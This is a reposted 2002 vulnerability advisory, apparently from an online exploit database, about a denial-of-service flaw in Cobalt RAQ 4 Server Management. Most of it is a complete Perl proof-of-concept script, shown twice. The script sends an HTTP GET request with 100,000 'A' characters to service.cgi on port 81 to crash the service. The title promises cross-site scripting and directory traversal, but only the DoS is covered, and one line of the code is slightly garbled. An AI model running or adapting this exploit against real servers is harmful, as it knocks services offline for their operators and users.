免费、自由、人人可编辑的漏洞库
,
INFO
------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal & DoS Vulnerabilities. ------oOo---------------- Company Affected: www.cobalt.com & www.sun.com Version: RAQ 4 Server Management. Dowload: http://www.cobalt.com/products/raq/index.html OS Affected: Linux ALL, Solaris ALL. Author: ** Alex Hernandez <email protected> ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. ----=Brief Description=------------ Denial Of service. Proof Of concept: Server crashes after sending a very long URL: Example: http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA Crash system and the admin need restart the service!. ------oOo------------- Exploit Code DoS Cobalt4_DoS.pl ------oOo------------- #!/usr/bin/perl # # Simple script to send a long 'A^s' command to the server, # resulting in the server crashing. # # Cobalt RAQ DoS v4 proof-of-concept exploit. # By Alex Hernandez <email protected> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. # # # Usage: perl -x Cobalt4_DoS.pl -s <server> # # Example: # # perl -x Cobalt4_DoS.pl -s 10.0.0.1 # # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); $def = "A"; $num = "100000"; $data .= $def x $num; $serv = $args{s}; $port = 81;#maybe u define the port for diference of versions $buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data /HTTP/1.0\r\n\r\n"; $in_addr = (gethostbyname($serv))4 || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("\nCrash was successful !\n\n"); sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} ------oOo------------------------------------ Vendor Response: The vendor was notified Posted List^s Security cobalt: email protected & email protected http://www.cobalt.com Patch Temporary: Delete files cgi^s from the system, or disable its possible execution. Alex Hernandez <email protected> (c) 2002. ------oOo------------------------------------
Cobalt4_DoS.pl
#!/usr/bin/perl # # Simple script to send a long 'A^s' command to the server, # resulting in the server crashing. # # Cobalt RAQ DoS v4 proof-of-concept exploit. # By Alex Hernandez <email protected> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti. # # # Usage: perl -x Cobalt4_DoS.pl -s <server> # # Example: # # perl -x Cobalt4_DoS.pl -s 10.0.0.1 # # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); $def = "A"; $num = "100000"; $data .= $def x $num; $serv = $args{s}; $port = 81;#maybe u define the port for diference of versions $buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data /HTTP/1.0\r\n\r\n"; $in_addr = (gethostbyname($serv))4 || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("\nCrash was successful !\n\n"); sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}
免费、自由、人人可编辑的漏洞库
